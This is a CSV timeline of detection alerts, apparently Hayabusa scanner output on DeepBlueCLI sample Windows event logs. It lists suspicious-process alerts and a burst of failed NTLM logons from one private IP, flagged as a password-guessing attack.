2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
